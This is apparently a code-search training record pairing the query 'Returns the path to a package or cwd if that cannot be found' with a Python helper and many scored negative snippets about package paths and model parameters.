"0.46168327", "0.46153858", "0.4613266", "0.46105587", "0.46047434", "0.4602617", "0.4599137", "0.4596063", "0.4593857", "0.45932138", "0.45921555", "0.45900294", "0.45885938", "0.45885423", "0.4587354", "0.45845202", "0.45809093", "0.4578839", "0.45774344" ]
0.6739887
0
Returns the parameters of the visualizer.
def parameters(self): return self._params
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parameters(self):\n return self.pars", "def parameters(self):\n return {\"W\": self.W,\n \"T\": self.T,\n \"P\": self.P}", "def parameters(self):\n return self.vars", "def show_parameters(self):\n with np.printoptions(precision=3, suppress=True):\n print('number of wind phase = {}'.format(self.ncomp))\n print('galactic parameter = {}'.format(self.scaling_field))\n print('reference height = {}'.format(self.z0))\n for p in ['cool_params','hot_params','params','ref_params','scaling_params']:\n params = getattr(self,p)\n print(p)\n for k,v in params.items():\n print(' {} = {}'.format(k,v))", "def paramDetails(cls):\n return {\n 'dim': (10, 20, 2, 20),\n 'nIter': (1, 10, 2, 5),\n 'lamb': (.1, 1., .1, .05),\n 'alph': (30, 50, 5, 40)\n }", "def get_params(self):\n return {\n \"nspecies\": self.nspecies,\n \"lmax\": self.lmax,\n \"nmax\": self.nmax,\n \"rcut\": self.rcut,\n \"sigma\": self.sigma,\n \"trans_width\": self.trans_width\n }", "def params(self):\n return {'cfg': self.cfg,\n 'momentum': self.momentum,\n 'center': self.center,\n 'scale': self.scale,\n 'epsilon': self.epsilon,\n 'act_fn': self.act_fn}", "def getParameters(self): #$NON-NLS-1$\r", "def _pprint_params(self):\n return {'x_range': self.x_range, 'y_range': self.y_range,\n 'step': self.step, 'shape': self.shape,\n 'type': self.type}", "def parameters(self):\n return {\"P\": self.P,\n \"T\": self.T}", "def parameters(self):", "def parameters(self):\n pass", "def parameters(self):\n return self.model.parameters()", "def parameters(self):\n return self._params", "def params(self):\n return self._pars", "def getParameters(self):\n return {'channels':self._channels, 'means':self._means, 'stds':self._stds}", "def getParams(self):\n\n\t\tparams = {\"Nparticles\":self.__Nparticles,\"Nkicks\":self.__Nkicks,\"kappa\":self.__kappa, \"eta\":self.__eta,\"gamma\":self.__gamma, \"omega\":self.__omega,\n\t\t\"Kbt\":self.__Kbt, \"tk\":self.__tk}\n\n\t\treturn params", "def getParams(self):\n return self.W, self.b", "def parameters(self):\n #print \"in instrument.parameter()\"\n return self._params", "def vwraysParameters(self):\n return self.__vwraysParameters", "def params(self):\n return {'shape': self.shape,\n 'name': self.name}", "def getParameters(self):\n\n current_params = {'taux': self.taux, 'mu': self.mu, 'G': self.G, 'alpha_0': self.alpha_0,\n 'delta': self.delta, 'p': self.p, 'I0': self.I0, 'kparam': self.kparam}\n\n return (current_params)", "def get_params(self):\n return self.w, self.b", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def get_params(self):", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def parameters(self):\n return []", "def get_params(self):\n pass", "def display_layer_parameters(self):\n pprint.pprint(vars(self))\n return", "def get_params_info(cls):\n return dict(\n config='laygo configuration dictionary.',\n threshold='transistor threshold flavor.',\n draw_boundaries='True to draw boundaries.',\n num_blk='number of driver 
segments.',\n show_pins='True to draw pin geometries.',\n )", "def _get_params(self):\r\n return np.hstack((self.varianceU,self.varianceY, self.lengthscaleU,self.lengthscaleY))", "def _get_params(self):\r\n return np.hstack((self.varianceU,self.varianceY, self.lengthscaleU,self.lengthscaleY))", "def getParams(self):\n return self.trainError, self.trainAcc, self.w", "def get_params(self) -> np.array:\n pass", "def get_params(self):\n return {'k': self.k, 'q': self.q, 'sigma_s': self.sigma_s, 'm': self.m}", "def params(self):\n\t\treturn self.params_", "def output_parameters(self):\n output_params = get_data_node(\n 'parameter',\n dict={\n 'stress': self.vasprun_obj.ionic_steps[-1]['stress'],\n 'efermi': self.vasprun_obj.efermi,\n 'energy': self.vasprun_obj.final_energy\n })\n return output_params", "def get_visual_properties(self) -> dict:\n return self._vis_properties", "def displayData(cls):\n return (\n \"paramName\",\n \"autoFollow\",\n \"lowerDisplay\",\n \"upperDisplay\",\n \"binCount\",\n \"xscale\",\n \"yweight\"\n )", "def _get_params(self):\r\n return self.k._get_params()", "def parameters(self):\n return self.trainer_parameters", "def parameters(self):\n return self.trainer_parameters", "def get_params(self):\n raise NotImplementedError", "def get_params(self):\n return self.params", "def get_params(self):\n return self.params", "def get_params(self):\n return self.params", "def parameters(self):\n return {\n 'base':self.base.parameters(),\n 'material':[m.parameters() for m in self.material],\n 'fraction':self.fraction,\n }", "def parameters(self):\n return self._loaded_and_cached(gdxcc.GMS_DT_PAR)", "def parameters(self):\n res = dict()\n res[\"population_size\"] = self.population_size\n res[\"mutation_prob\"] = self.mutation_prob\n res[\"crossover\"] = self.crossover\n res[\"selection\"] = self.selection\n res[\"sigma\"] = self.sigma\n res[\"crossover_method\"] = self.crossover_method\n res[\"selection_method\"] = self.selection_method\n res[\"best_rate\"] = self.best_rate\n res[\"n_parents\"] = self.n_parents\n res[\"model_parameters\"] = self.model.total_parameters()\n res[\"IDCT_from\"] = self.IDCT_from\n res[\"elitism\"] = self.elitism\n return res", "def parameters(self):\n\n return self._parameters", "def getInitParams(self):\n paramDict = super().getInitParams()\n paramDict[f'OutStream Available {self.dim}D :'] = self.availableOutStreamTypes[self.dim]\n paramDict['Plot is '] = str(self.dim) + 'D'\n for index in range(len(self.sourceName)):\n paramDict['Source Name ' + str(index) + ' :'] = self.sourceName[index]\n\n return paramDict", "def get_params (self):\n return self.params", "def get_params (self):\n return self.params", "def display_sim_parameters(self):\n pprint.pprint(vars(self))\n return", "def get_parameters(self):\n params = {\"train_frac\": self.train_frac, \"split_alg\": self.split_alg,\n \"nw_name\": self._nw_name, \"split_id\": self.split_id}\n return params", "def parameters(self):\n return {\"W\": self.W,\n \"T\": self.T,\n \"P\": self.P,\n \"Wo\": self.Wo,\n \"To\": self.To,\n \"Po\": self.Po}", "def print_params(self):\n s = self._list_params()+\"\\n\"\n if 'scale_params' in self.__dict__.keys():\n s += self.scale_params._list_params()+\"\\n\"\n if 'atmospheric_params' in self.__dict__.keys():\n if self.atmospheric_params is not None:\n s += self.atmospheric_params._list_params()+\"\\n\"\n\n if 'atemperature_params' in self.__dict__.keys():\n if self.atemperature_params is not None:\n s += self.atemperature_params._list_params()+\"\\n\"\n\n if 
'oceanic_params' in self.__dict__.keys():\n if self.oceanic_params is not None:\n s += self.oceanic_params._list_params()+\"\\n\"\n\n if 'ground_params' in self.__dict__.keys():\n if self.ground_params is not None:\n s += self.ground_params._list_params()+\"\\n\"\n\n if 'gotemperature_params' in self.__dict__.keys():\n if self.gotemperature_params is not None:\n s += self.gotemperature_params._list_params() + \"\\n\"\n\n print(\"Qgs v0.2.8 parameters summary\")\n print(\"=============================\\n\")\n print(s)", "def params(self):\n return {'kernel_size': self.kernel_size,\n 'stride': self.stride,\n 'n_kernel': self.n_kernel,\n 'padding': self.padding,\n 'act_fn': self.act_fn,\n 'w_init_fn': self.w_init_fn,\n 'resize': self.resize,\n 'use_bias': self.use_bias,\n 'atrous': self.atrous,\n 'idx': self.idx}", "def get_params(self):\n return self.arr", "def getInitParams(self):\n paramDict = super().getInitParams()\n paramDict['method'] = self.method\n paramDict['dimension'] = self.dimension\n paramDict['rank'] = self.rank\n paramDict['mu'] = self.mu\n paramDict['covariance'] = self.covariance\n return paramDict", "def get_params(self):\n return {\"d\": \"155\"}", "def params(self):\n return self._params", "def params(self):\n return self._params", "def params(self):\n return self._params", "def parameters(self) -> Dict[str, Any]:\n return self.trainer_parameters", "def prms(widget: QWidget) -> List:\n parameters = BaseTrain.prms(widget)\n return parameters", "def attributes(self):\n params = self.model.param_array\n return {'parameters': params}", "def parameters(self) -> dict:\n return self._config.get('parameters', dict())", "def _get_parameters(self) -> list:\n return self.parameters", "def parameters(self) -> Dict[str, str]:\n return self._parameters", "def params(self):\n return {'out_dim': self.out_dim,\n 'act_fn': self.act_fn,\n 'use_bias': self.use_bias,\n 'idx': self.idx}", "def lattice_parameters(self):\n return self.a, self.b, self.c, self.alpha, self.beta, self.gamma", "def parameters(self) -> ReportParameters:\n return self.__parameters", "def get_parameters(self):\n d = Algorithm.get_parameters(self)\n d.update({\n 'M': d.pop('population_size', self.population_size),\n 'num_tests': self.num_tests,\n 'num_searches': self.num_searches,\n 'num_searches_best': self.num_searches_best,\n 'bonus1': self.bonus1,\n 'bonus2': self.bonus2,\n 'num_enabled': self.num_enabled,\n 'local_searches': self.local_searches\n })\n return d", "def init_params(self):\n self.params = Parameters()\n self.params.add('qoff', self.qoff, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('yscale', self.yscale, vary=0, min=0, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('int_bg', self.int_bg, vary=0, min=0, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('Rc', self.Rc, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('sur_den', self.sur_den, vary=0, min=0, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('ion_depth', self.ion_depth, vary=0, min=0, max=np.inf, expr=None, brute_step=0.1)", "def accepted_params(self):\n return self.ptm.current_luiti_visualiser_env[\"additional_task_parameters\"]", "def _get_params(self):\r\n return np.hstack((self.variance, self.lengthscale))", "def _get_params(self):\r\n return np.hstack((self.variance, self.lengthscale))", "def get_params(self):\n\n params={'f_star':self.get_f_star(), 'g_star':self.get_g_star(), \n 'Delta2_star':self.get_Delta2_star(), \n 'n_star':self.get_n_star(), 
'alpha_star':self.get_alpha_star()}\n\n return params", "def get_object_params(self):\n return self.mass, self.x, self.y", "def getParameters(self):\n params = []\n for m in [self.ix, self.ih, self.fx, self.fh, self.ox, self.oh, self.ux, self.uh]:\n # we do not get param of output module\n l = list(m.parameters())\n params.extend(l)\n\n one_dim = [p.view(p.numel()) for p in params]\n params = F.torch.cat(one_dim)\n return params", "def getParameters(self):\n params = []\n for m in [self.ix, self.ih, self.fx, self.fh, self.ox, self.oh, self.ux, self.uh]:\n # we do not get param of output module\n l = list(m.parameters())\n params.extend(l)\n\n one_dim = [p.view(p.numel()) for p in params]\n params = F.torch.cat(one_dim)\n return params", "def parameters(self):\n if self.state is not None:\n return self.state.tensors()\n else:\n return []", "def params(self):\n return {'kernel_size': self.kernel_size,\n 'stride': self.stride,\n 'n_kernel': self.n_kernel,\n 'padding': self.padding,\n 'act_fn': self.act_fn,\n 'output_shape': self.output_shape,\n 'w_init_fn': self.w_init_fn,\n 'use_bias': self.use_bias,\n 'idx': self.idx}", "def parameters(self):\n params = dict()\n try:\n params['voltage'] = self.voltage()\n params['output'] = self.output()\n return params\n except:\n return \"Disconnected\"", "def _get_params(self):\r\n return np.hstack((self.variance,self.lengthscale))", "def printParameters(self):\n print(\"----------Model Parameters----------\")\n print(\"Initial Conv. Depth : \" + str(self.conv_depth))\n print(\"Number of Classes : \" + str(self.n_classes))\n print(\"Dropout : \" + str(self.dropout))\n print(\"Activation Function : Relu\")\n print(\"Input Shape : \" + str(self.input_shape))\n print(\"Batch Size : \" + str(self.batch_size))\n print(\"--------Optimizer Parameters--------\")\n print(\"Learning Rate : \" + str(self.optimizer.lr))\n print(\"Momentum : \" + str(self.optimizer.momentum))\n print(\"Initial Decay : \" + str(self.optimizer.initial_decay))", "def parameters(self):\n return self._default_params", "def show_params(self):\n \n return self.params[self.profile]" ]
[ "0.72978354", "0.72489446", "0.71823865", "0.71531653", "0.71393967", "0.70387006", "0.7021024", "0.69855696", "0.6905784", "0.68682903", "0.6830659", "0.6822782", "0.68215054", "0.6812191", "0.6792472", "0.67726594", "0.6756347", "0.6737905", "0.67369354", "0.67361426", "0.6695787", "0.66600984", "0.6657674", "0.6654178", "0.6654178", "0.6654178", "0.6654178", "0.6654178", "0.6654178", "0.6654178", "0.6654178", "0.6653527", "0.66096044", "0.66096044", "0.66096044", "0.66096044", "0.66096044", "0.65989953", "0.6582415", "0.65791243", "0.6571337", "0.6565985", "0.6565985", "0.656205", "0.654627", "0.6542246", "0.65418047", "0.6531596", "0.6527241", "0.6494951", "0.6482152", "0.6479929", "0.6479929", "0.6477382", "0.6477374", "0.6477374", "0.6477374", "0.6472181", "0.6461943", "0.6461773", "0.645946", "0.6453247", "0.6415906", "0.6415906", "0.64106804", "0.6404446", "0.63996017", "0.63995147", "0.6396234", "0.63924325", "0.63725203", "0.6361668", "0.6352167", "0.6352167", "0.6352167", "0.6348243", "0.63055444", "0.6304227", "0.6303975", "0.6297032", "0.6286121", "0.6280712", "0.62744766", "0.62708694", "0.6269244", "0.6267183", "0.62654835", "0.6243201", "0.6243201", "0.62371254", "0.62342006", "0.6232466", "0.6232466", "0.62319887", "0.6223981", "0.6223915", "0.62142223", "0.61867654", "0.6183377", "0.61819005" ]
0.67491484
17
Returns the path to a package or cwd if that cannot be found.
def _get_package_path(name): # 获取 模块包 路径, Flask() 中 引用 try: return os.path.abspath(os.path.dirname(sys.modules[name].__file__)) except (KeyError, AttributeError): return os.getcwd()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_package_path():\n package_name = get_package_name()\n return package_name.replace('.', '/')", "def get_package_dir():\n return Path(__file__).parent", "def get_packages_path_from_package(package):\n root = finder.get_package_root(package)\n\n if is_built_package(package):\n package_name_folder = os.path.dirname(root)\n\n return os.path.dirname(package_name_folder)\n\n return os.path.dirname(root)", "def find_package_path(path: Path) -> Optional[Path]:\n for package_path in path.iterdir():\n if is_package_dir(package_path):\n return package_path", "def GetPackageDirectory():\n return os.path.dirname(__file__)", "def get_package_root(package):\n path_to_package = package.resource.location\n\n if not os.path.isdir(path_to_package) and hasattr(package, \"filepath\"):\n return os.path.dirname(package.filepath)\n\n path = os.path.join(path_to_package, package.name, str(package.version))\n\n if not os.path.isdir(path):\n raise EnvironmentError(\n 'Package \"{package}\" has an invalid path \"{path}\".'\n \"\".format(package=package, path=path)\n )\n\n return path", "def package_path(pkg):\n fname = pkgutil.get_loader(pkg).get_filename()\n dirname = op.dirname(fname)\n dirname = op.abspath(op.join(dirname, '..'))\n return dirname", "def pypkgpath(self):\n pkgpath = None\n for parent in self.parts(reverse=True):\n if parent.isdir():\n if not parent.join(\"__init__.py\").exists():\n break\n if not isimportable(parent.basename):\n break\n pkgpath = parent\n return pkgpath", "def package_to_path(package):\n return package.replace('.','/')", "def sublime_haskell_package_path():\n return os.path.dirname(os.path.realpath(__file__))", "def get_pack_path():\r\n return get_package_path().replace(\"\\\\\", \"/\").replace(\"src\", \"\")", "def module_path() -> Path:\n if hasattr(sys, \"frozen\"):\n return Path(sys.executable).resolve().parent\n else:\n return (Path(__file__) / \"..\").resolve().parent", "def determine_python_path():\n if git_install_requested():\n projects_yaml = config('openstack-origin-git')\n projects_yaml = git_default_repos(projects_yaml)\n return os.path.join(git_pip_venv_dir(projects_yaml),\n 'lib/python2.7/site-packages')\n else:\n return None", "def cwd_in_path():\n ...", "def acquire_package_directory():\n top_plugin_dir = os.path.realpath(os.path.join(os.getcwd(),\n os.path.dirname(__file__)))\n expected_package_dir = '/extras/MockApp'\n app_dir = top_plugin_dir + expected_package_dir\n return app_dir", "def package_dir(self):\r\n return \".\"", "def check_package_path(pkg):\n src_dir_root = ''\n print(\"[root-get] DEBUG: Checking package path\")\n check_package_name = os.system('find %s -maxdepth 1 -type d -name \"%s\" ! -path \"*tutorials*\" ! 
-path \"*dictpch*\"' % (ROOT_SOURCES, pkg))\n if check_package_name != 0:\n print(\"Not a ROOT package (we are working only with ROOT packages for now.)\")\n return False\n else:\n # if have such directory in root then we can try to get it's real path\n path = PathChecker()\n src_dir_root = path.path4pkg(pkg, ROOT_SOURCES)\n print(\"[root-get] We would use a package from {0:s}\".format(src_dir_root))\n return src_dir_root", "def find_path():\n __dir_path__ = os.path.dirname(os.path.realpath(__file__))\n return __dir_path__", "def _pkg_path(self, pkg):\n r = rospkg.RosPack()\n pkg_path = r.get_path(pkg) \n return pkg_path", "def _pkg_path(self, pkg):\n r = rospkg.RosPack()\n pkg_path = r.get_path(pkg) \n return pkg_path", "def get_package_init_path(self, pkgname, pkgdir):\n\n pkgdir = os.path.abspath(pkgdir)\n\n # Try __init__.py\n pkginitfile = os.path.join(pkgdir, '__init__.py')\n # If it does not exist, try <pkgname>.py\n if not os.path.isfile(pkginitfile):\n pkginitfile = os.path.join(pkgdir,pkgname + '.py')\n\n if os.path.isfile(pkginitfile):\n return pkginitfile\n else:\n # Everything failed, return pkgdir itself!\n return pkgdir", "def linkpath(srcdir, pkg):\n home = os.getenv('HOME')\n if srcdir:\n rval = '{}/{}'.format(srcdir, pkg)\n else:\n rval = '{}/bin/{}'.format(home, pkg)\n return rval", "def findPkgPath(self, pkg):\r\n try:\r\n return self._rp.get_path(pkg)\r\n except rospkg.ResourceNotFound:\r\n raise ResourceNotFound('Can not find ROS package '\r\n '\"{0}\".'.format(pkg))", "def get_path_from_package(package):\n if isinstance(package, str):\n pkg = package\n elif isinstance(package, _ModuleType):\n pkg = package.__package__\n else:\n raise ValueError('Invalid package type, must be str or module')\n dist = _pkg_resources.get_distribution(pkg)\n return dist.location, dist.version", "def get_package_path(ontology, parent, package):\n result = get_ontology_name(ontology)\n result += '.v'\n result += get_ontology_version(ontology)\n result += '.'\n result += get_package_name(parent)\n result += '.'\n result += get_package_name(package)\n return result", "def module_path():\r\n if hasattr(sys, \"frozen\"):\r\n return os.path.dirname(sys.executable)\r\n return os.path.dirname(__file__)", "def package_path(self, package_name):\n if not self.is_adb_available():\n return None\n\n _path = self._do_adb_command('shell pm path ' + package_name)\n if _path:\n try:\n _path = _path.join(_path.split()) # remove \\r\\n\n _path = _path.split(':')\n if len(_path) > 1 and _path[0] == 'package':\n ret = _path[1]\n if ret.endswith('apkpackage'):\n # handle new android packages\n ret = '/'.join(ret.split('/')[:-1])\n return ret\n except ValueError:\n pass\n\n return None", "def get_package_share_path(package_name, print_warning=True):\n path = pathlib.Path(get_package_share_directory(package_name, print_warning=False))\n if print_warning and not path.exists():\n warnings.warn(f'Share path for {package_name} ({path}) does not exist.', stacklevel=2)\n return path", "def get_path() -> str:\n return os.path.dirname(os.path.realpath(__file__))", "def find_package(import_name):\n root_mod_name = import_name.split('.')[0]\n loader = pkgutil.get_loader(root_mod_name)\n if loader is None or import_name == '__main__':\n # import name is not found, or interactive/main module\n package_path = os.getcwd()\n else:\n # For .egg, zipimporter does not have get_filename until Python 2.7.\n if hasattr(loader, 'get_filename'):\n filename = loader.get_filename(root_mod_name)\n elif hasattr(loader, 'archive'):\n # 
zipimporter's loader.archive points to the .egg or .zip\n # archive filename is dropped in call to dirname below.\n filename = loader.archive\n else:\n # At least one loader is missing both get_filename and archive:\n # Google App Engine's HardenedModulesHook\n #\n # Fall back to imports.\n __import__(import_name)\n filename = sys.modules[import_name].__file__\n package_path = os.path.abspath(os.path.dirname(filename))\n\n # In case the root module is a package we need to chop of the\n # rightmost part. This needs to go through a helper function\n # because of python 3.3 namespace packages.\n if _is_package(loader, root_mod_name):\n package_path = os.path.dirname(package_path)\n\n site_parent, site_folder = os.path.split(package_path)\n py_prefix = os.path.abspath(sys.prefix)\n if package_path.startswith(py_prefix):\n return py_prefix, package_path\n elif site_folder.lower() == 'site-packages':\n parent, folder = os.path.split(site_parent)\n # Windows like installations\n if folder.lower() == 'lib':\n base_dir = parent\n # UNIX like installations\n elif os.path.basename(parent).lower() == 'lib':\n base_dir = os.path.dirname(parent)\n else:\n base_dir = site_parent\n return base_dir, package_path\n return None, package_path", "def getPackagePath(self):\n return self._packagePath", "def _get_package_directory(self, package_name: str) -> str:\n return os.path.abspath(\n os.path.join(\n os.path.dirname(__file__),\n '..', '..', 'assets', package_name, package_name,\n )\n )", "def which():\n\n location = None\n if os.path.basename(_git_path) != _git_path:\n if os.path.isfile(_git_path):\n location = _git_path\n else:\n paths = [x for x in os.environ[\"PATH\"].split(os.pathsep) if not x.isspace()]\n for path in paths:\n exe = os.path.join(path, _git_path)\n if os.path.isfile(exe):\n location = exe\n break\n return location", "def module_path():\n return os.path.dirname(unicode(__file__, sys.getfilesystemencoding( )))", "def get_python_package_entry_point(package, entry_point):\n site_packages_path = _dirname(_import_module(package).__path__[0])\n\n # Find package info\n # Can be a directory ending by \".dist-info\" or \".egg-info\"\n with _scandir(site_packages_path) as entries:\n for entry in entries:\n if (entry.name.startswith(f'{package}-') and\n _splitext(entry.name)[1] in ('.dist-info', '.egg-info')):\n package_info_path = entry.path\n break\n\n else:\n # Package is not installed or do not have package info\n return None\n\n # Find manifest file\n # Can be a \"RECORD\" or a \"installed-files.txt\" file in package info folder\n for name in ('RECORD', 'installed-files.txt'):\n manifest_path = _join(package_info_path, name)\n if _isfile(manifest_path):\n break\n\n else:\n # Package do not have manifest file\n return None\n\n # Find entry point relative path in manifest file\n # Possibles manifest file lines formats: \"path\\n\" or \"path,checksum\\n\"\n with open(manifest_path, 'rt') as manifest:\n\n for line in manifest:\n entry_point_rel_path = line.strip().split(',', 1)[0]\n if _basename(entry_point_rel_path) == entry_point:\n break\n\n else:\n # Entry point is not present in manifest\n return None\n\n # Convert to absolute path\n # Paths in manifest are relative to site-packages or package info\n for prefix in (site_packages_path, package_info_path):\n entry_point_path = _realpath(_join(prefix, entry_point_rel_path))\n\n if _isfile(entry_point_path):\n return entry_point_path", "def _get_module_path():\n\n return os.path.dirname(os.path.realpath(__file__))", "def repo_root() -> str:\n path 
= os.path.realpath(os.curdir)\n\n while True:\n if os.path.exists(os.path.join(path, \"setup.py\")):\n return path\n path = os.path.realpath(os.path.join(path, \"..\"))", "def locate_nuget():\n if NuGetRunner.valid_nuget_executable(\"nuget\"):\n return \"nuget\"\n return None", "def get_sp_dir(): # pragma: no cover\n for p in sys.path[::-1]:\n if p.endswith(\"site-packages\"):\n return p\n raise Exception(\"'site-package' directory not found!\")", "def module_path(self):\n return self.config['cwd']", "def _find_root() -> pathlib.Path:\n cwd = pathlib.Path.cwd()\n while not (\n pathlib.Path(cwd, \"pyproject.toml\").exists() or\n pathlib.Path(cwd, \"poetry.lock\").exists() or\n pathlib.Path(\"/\") == cwd\n ):\n cwd = cwd.parent\n return cwd", "def get_pip_path():\n\n return get_executable_path('pip')", "def _parent_path(pkg, pkg_path):\n parent = pkg_path[: -len(pkg)] if pkg_path.endswith(pkg) else pkg_path\n return parent.rstrip(\"/\" + os.sep)", "def app_package_path(self) -> str:\n return self._app_package_path", "def get_build_dir(package_dir):\n return os.path.split(makepkg([\"--packagelist\"], True, package_dir)[0])[0]", "def rel_cwd():\n return os.path.relpath(os.getcwd(), git_toplevel())", "def path(self):\n installed_packages_folder_path = site.getsitepackages()[0]\n return f'{installed_packages_folder_path}/{SITE_PACKAGES_FOLDER_NAME}'", "def find_locustfile(locustfile):\n # Obtain env value\n names = [locustfile]\n # Create .py version if necessary\n if not names[0].endswith('.py'):\n names += [names[0] + '.py']\n # Does the name contain path elements?\n if os.path.dirname(names[0]):\n # If so, expand home-directory markers and test for existence\n for name in names:\n expanded = os.path.expanduser(name)\n if os.path.exists(expanded):\n if name.endswith('.py') or _is_package(expanded):\n return os.path.abspath(expanded)\n else:\n # Otherwise, start in cwd and work downwards towards filesystem root\n path = os.path.abspath('.')\n while True:\n for name in names:\n joined = os.path.join(path, name)\n if os.path.exists(joined):\n if name.endswith('.py') or _is_package(joined):\n return os.path.abspath(joined)\n parent_path = os.path.dirname(path)\n if parent_path == path:\n # we've reached the root path which has been checked this iteration\n break\n path = parent_path", "def find_locustfile(locustfile):\n # Obtain env value\n names = [locustfile]\n # Create .py version if necessary\n if not names[0].endswith('.py'):\n names.append(names[0] + '.py')\n # Does the name contain path elements?\n if os.path.dirname(names[0]):\n # If so, expand home-directory markers and test for existence\n for name in names:\n expanded = os.path.expanduser(name)\n if os.path.exists(expanded):\n if name.endswith('.py') or _is_package(expanded):\n return os.path.abspath(expanded)\n else:\n # Otherwise, start in cwd and work downwards towards filesystem root\n path = os.path.abspath('.')\n while True:\n for name in names:\n joined = os.path.join(path, name)\n if os.path.exists(joined):\n if name.endswith('.py') or _is_package(joined):\n return os.path.abspath(joined)\n parent_path = os.path.dirname(path)\n if parent_path == path:\n # we've reached the root path which has been checked this iteration\n break\n path = parent_path\n # Implicit 'return None' if nothing was found", "def path(self):\n if not self._path:\n logger.spam(\"Checking for helper executable %s\", self.name)\n self._path = distutils.spawn.find_executable(self.name)\n if self._path:\n logger.debug(\"%s is at %s\", self.name, self.path)\n 
self._installed = True\n else:\n logger.debug(\"No path to %s found\", self.name)\n return self._path", "def find_resource_dir(self, dock_image: str, meta: dict) -> str:\n try:\n return self.interrogate_python_package_location(dock_image, meta)\n except CalledProcessError:\n return ''", "def _get_package_dir(self, package, component):\n return join('pool', component, Repository.get_pool(package), package)", "def find_setup_dir():\n dirname = os.path.dirname(__file__)\n if \"/site-packages/\" in dirname:\n prefix = dirname[:dirname.index(\"/site-packages/\")]\n for suffix in [\"share/openchange/setup\", \"share/setup\", \"share/samba/setup\", \"setup\"]:\n ret = os.path.join(prefix, suffix)\n if os.path.isdir(ret):\n return ret\n # In source tree\n ret = os.path.join(dirname, \"../../setup\")\n if os.path.isdir(ret):\n return ret\n raise Exception(\"Unable to find setup directory.\")", "def name(self):\n\n if self.package:\n directory = self.package.directory\n if self.package.resolve_root:\n directory = directory.joinpath(self.package.resolve_root)\n rel = None\n try:\n rel = self.filename.with_suffix('').relative_to(directory)\n except ValueError as e:\n if self.package.resolve_root:\n # Possibly this module is required from a directory outside of\n # the package's resolve_root, and Path.relative_to() will raise a\n # ValueError if the file is not inside the specified directory.\n try:\n rel = type(self.filename)(os.path.relpath(str(self.filename.with_suffix('')), str(directory)))\n except ValueError as e:\n pass # On a different drive\n pass\n if rel:\n parts = filter(bool, utils.path.lparts(rel))\n return self.package.name + '/' + '/'.join(parts)\n\n return self.filename.stem", "def get_path():\n return path.abspath(path.dirname(path.dirname(__file__)))", "def _package_root(name):\n return name.split('.', 1)[0]", "def package_folder(self):\n return self._base_package", "def path(src, name='default'):\n try:\n return get_output(['hg', 'path', name], cwd=src).strip()\n except subprocess.CalledProcessError:\n return None", "def module_path():\n try:\n this_file_path = __file__\n except NameError:\n # inside an interpreter, we can use the stack to find the file\n # path.\n tbs = traceback.extract_stack()\n this_file_path = tbs[0][0]\n # move back up to rfm directory\n dev_root = os.path.dirname(this_file_path)\n\n return dev_root", "def srcdir(path):\n if not workflow.included_stack:\n return None\n return workflow.current_basedir.join(path).get_path_or_uri()", "def getcwd():\n cwd = os.getcwd()\n # os.getcwd works properly with Python 3 on Windows.\n # We need this workaround only for Python 2 on Windows.\n if is_win and is_py2:\n try:\n unicode(cwd)\n except UnicodeDecodeError:\n # Do conversion to ShortPathName really only in case 'cwd' is not\n # ascii only - conversion to unicode type cause this unicode error.\n try:\n import win32api\n cwd = win32api.GetShortPathName(cwd)\n except ImportError:\n pass\n return cwd", "def package_source_space(self, package):\n for pkg_name, pkg in self.packages:\n if pkg_name == package.name:\n pkg_dir = os.path.dirname(pkg.filename)\n # Need to check if the pkg_dir is the source space as it can also be loaded from the metadata\n if os.path.commonpath([self.source_space_abs, pkg_dir]) == self.source_space_abs:\n return pkg_dir\n\n return None", "def get_target_folder() -> str:\n return os.path.abspath(os.path.join(dirname(__file__), os.pardir, os.pardir, \"provider_packages\"))", "def getPackageName(rootDir=\"python\"):\n dirIter = os.walk(rootDir)\n 
(dirPath, dirList, fileList) = next(dirIter)\n dirList = [dirName for dirName in dirList if not dirName.startswith(\".\")]\n if len(dirList) != 1:\n raise RuntimeError(\"Found %s instead of 1 directory\" % (dirList,))\n return dirList[0]", "def get_cwd():\n return os.getcwd()", "def get_deps_path(root):\n app_root = os.path.join(root, DEPS_PATTERN)\n files = glob.glob(app_root)\n if len(files) != 1:\n return None\n return files[0]", "def __get_module_root_dir(self):\n # type: () -> str\n if self.location in ['.', '.' + os.sep]:\n return self.env_root\n if self.source != 'local':\n return self.__fetch_remote_source()\n return os.path.join(self.env_root, self.location)", "def get_source_package_path(provider_package_id: str) -> str:\n return os.path.join(PROVIDERS_PATH, *provider_package_id.split(\".\"))", "def get_python_path():\n\n return get_executable_path('python')", "def get_proj_dir(path: Union[pathlib.PurePath, str] = __file__) -> str:\n return str(pathlib.Path(path).parent.absolute())", "def get_package_share_directory(package_name, print_warning=True):\n path = os.path.join(get_package_prefix(package_name), 'share', package_name)\n if print_warning and not os.path.exists(path):\n warnings.warn(f'Share directory for {package_name} ({path}) does not exist.', stacklevel=2)\n return path", "def get_project_source_dir() -> Path:\n return Path(__file__).resolve().parents[1].resolve()", "def root_dir():\r\n return Path(__file__).parent.parent", "def get_project_root() -> pl.Path:\n return pl.Path(__file__).parent.parent", "def _find_project_by_import():\n try:\n import _databand_project\n\n return abs_join(_databand_project.__file__, \"..\")\n except ImportError:\n dbnd_log_init_msg(\"Can't import `_databand_project` marker.\")\n return None", "def get_cur_directory(file_name: str=__file__) -> str:\n if hasattr(sys, 'frozen') and sys.frozen:\n path, filename = os.path.split(sys.executable)\n directory = path\n else:\n directory = os.path.dirname(os.path.realpath(file_name))\n return directory", "def this_folder():\n if getattr(sys, 'frozen', False):\n # The application is frozen\n return os.path.dirname(sys.executable)\n else:\n # The application is not frozen\n return os.path.dirname(__file__)", "def package_dest_path(self, package):\n\n if self.destdir is None:\n return self.package_final_path(package)\n 